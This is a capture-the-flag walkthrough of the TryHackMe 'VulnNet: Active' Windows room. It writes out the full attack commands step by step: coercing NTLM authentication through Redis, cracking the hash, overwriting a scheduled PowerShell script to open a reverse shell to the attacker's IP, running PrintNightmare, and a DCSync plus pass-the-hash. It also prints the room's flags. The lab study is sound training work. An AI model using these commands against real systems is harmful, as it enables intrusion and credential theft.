VulnNet: Active TryHackMe Walkthrough

TL;DR Walkthrough of the VulnNet: Active TryHackMe room.

THM Walkthroughs:

A full list of our TryHackMe walkthroughs and cheatsheets is here.

Background

I am continuing to do various Windows focused rooms that don’t have webapps and studying for a Microsoft exam as therapy after taking the PT1 exam. TryHackMe has been having a lot of connection issues lately, which is why you will see the target VM change during this walkthrough. I had to reset it a few times as it would hang and become completely unresponsive.

Enumeration

As always I started out with an nmap scan.

sudo nmap -p1–10000 -Pn -sC -sV -O 10.201.125.206

It looks like a Windows VM, but it’s not showing the information that a DC would normally show. This led me to suspect that we are meant to abuse a random service for initial access.

Redis is running on port 6379. Redis is one of the most popular NoSQL databases. I’m not a ‘DB Guy’, so I hadn’t heard of it. I only recently learned how to automate spinning up and configuring MSSQL so I could integrate it into Mishky’s AD Range.

ChatGPT hooked me up though with a simple way to connect and then elicit an authentication attempt from Redis back to our Kali. This TTP allows us to capture an NTLMv2 which we can then attempt to crack.

Start by running responder on Kali.

sudo responder -I tun0 -dwv

Then connect to Redis and tell it to retrieve a file from Kali. Please note that the file doesn’t have to actually exist.

redis-cli -h 10.201.125.206

CONFIG SET dir \\10.23.20.245\share\fake.dll
CONFIG SET dbfilename test.rdb
Save

I then captureed an authentication attempt with responder.

enterprise-security::VULNNET:26e904fdb362d981:3FCDD44DF85A4DE3B7D44F1B8101F960:0101000000000000008BD05F280CDC01041F83D6C7E55F510000000002000800470052005100360001001E00570049004E002D004C0043003500480058004400540059004B004300520004003400570049004E002D004C0043003500480058004400540059004B00430052002E0047005200510036002E004C004F00430041004C000300140047005200510036002E004C004F00430041004C000500140047005200510036002E004C004F00430041004C0007000800008BD05F280CDC010600040002000000080030003000000000000000000000000030000058AECC0702FC46E63C355964860F3712C83E9E44E705C1340570D543C90295A60A001000000000000000000000000000000000000900220063006900660073002F00310030002E00320033002E00320030002E003200340035000000000000000000

I copy/pasted the hash into VulnNet.txt and ran rockyou against it with john.

john VulnNet.txt --wordlist=/home/kali/rockyou.txt

I got:

sand_0873959498 (enterprise-security)

Initial Access

Nice, we have legitimate credentials now. We can run authenticated enumeration with enum4linux and look for interesting share drives, usernames, groups, etc.

enum4linux -u enterprise-security -p 'sand_0873959498' -a 10.201.21.137

smbclient //10.201.34.232/Enterprise-Share -U 'enterprise-security'

There’s only one file there, a PS1 containing:

rm -Force C:\Users\Public\Documents\* -ErrorAction SilentlyContinue

I made the bold assumption that there is a scheduled task running this PS1. Hence I created a file on Kali named ‘PurgeIrrelevantData_1826.ps1’ and copy/pasted Invoke-PowerShellTcp.ps1 into it. You can grab a copy here. I then added one line at the bottom that will run the function defined in Invoke-PowerShellTcp and establish a reverse shell back to Kali.

Invoke-PowerShellTcp -Reverse -IPAddress 10.23.20.245 -Port 443

I started a listener on Kali.

nc -lvnp 443

I then uploaded the PS1 to the target VM using smbclient. This overwrites the existing file by default with our copy.

put PurgeIrrelevantData_1826.ps1

On a sidenote, I didn’t get a reverse shell with ChatGPT’s oneliner, I had to use Invoke-PowerShellTcp. CRTP for the win, Invoke-PowerShellTcp.ps1 was one of the tools Altered Security stressed in that course and exam.

I caught a shell as vulnnet\enterprise-security.

Privilege Escalation

I went out on another limb here, I simply assumed the VM was vulnerable to the PrintSpooler bug and tried that. It didn’t work so I tried PrintNightmare next. These were massive bugs in Windows recently after all and CTF type VMs tend to use them.

I grabbed a copy of CVE-202101675.ps1 from here and hosted it on Kali using the simple HTTP server.

python3 -m http.server 80

Download it to the target Windows VM using that reverse shell we got, import it, and run it.

certutil -urlcache -split -f http://10.23.20.245/CVE-2021-1675.ps1 C:\Users\enterprise-security\Downloads\CVE-2021–1675.ps1
Import-Module .\cve-2021–1675.ps1
Invoke-Nightmare

This adds user `adm1n`/`P@ssw0rd` in the local admin group by default according to the author’s GitHub. I found in practice that if the target VM is a DC then it adds that user to the Administrators group in AD.

Post Compromise

Astute readers likely know where I am going next. After all, we know what groups in AD can DCSync by default:

• Administrators
• Domain Admins
• Enterprise Admins
• Domain Controllers
• NT AUTHORITY\SYSTEM

We have an account in the Administrators group now, let’s DCSync!

/usr/share/doc/python3-impacket/examples/secretsdump.py -just-dc adm1n:P\@ssw0rd@10.201.34.232

I tried to use the Administrator’s NTLM and WinRM to access the VM.

evil-winrm -i 10.201.34.232 -u Administrator -H 85d1fadbe37887ed63987f822acb47f1

However the VM was janky, or TryHackMe was being too slow and timing out. Either way, I couldn’t get evil-winrm to connect even though WinRM was enabled.

I ended up just using wmiexec.

/usr/share/doc/python3-impacket/examples/wmiexec.py vulnnet.local/administrator@10.201.34.232 -hashes aad3b435b51404eeaad3b435b51404ee:85d1fadbe37887ed63987f822acb47f1

C:\Users\Administrator\Desktop>type system.txt
THM{d540c0645975900e5bb9167aa431fc9b}

C:\Users\enterprise-security\Desktop>type user.txt
THM{3eb176aee96432d5b100bc93580b291e}

Room Q&A

What is the user flag? (Desktop\user.txt)

THM{3eb176aee96432d5b100bc93580b291e}

What is the system flag? (Desktop\system.txt)

THM{d540c0645975900e5bb9167aa431fc9b}

Summary

On a sidenote, I took a look at startup.bat while I was poking around in the VM. It’s what’s running the PS1 file that we are meant to find and modify.

:home
TIMEOUT /T 30 /NOBREAK
powershell.exe -File C:\Enterprise-Share\PurgeIrrelevantData_1826.ps1
TIMEOUT /T 30
cls
Goto :home

I wasn’t really a ‘Windows Guy’ until after PowerShell debuted, but I Googled and found that essentially this waits 30 seconds, runs the PS1, waits 30 seconds, and then repeats the entire bat file. It’s a loop that runs the specified PS1 every minute.

Overall this wasn’t a bad room. The VM is a DC for the domain vulnnet.local, but it doesn’t act like one. The room’s author decided to block connections to the common ports that a DC uses and have us attack it like it was a standalone Windows VM. Essentially we abused a misconfigured service [Redis] to gain credentials, abused a writeable PS1 on a share drive to get a reverse shell, and then abused an unpatched vulnerability to escalate privileges locally. There was no AD involved. In that sense in was much like the “AD Pentest” portion of the PT1 exam, so it was good practice for that.

References

Redis: https://en.wikipedia.org/wiki/Redis

Invoke-PowerShellTcp: https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1

PrintNightMare: https://github.com/calebstewart/CVE-2021-1675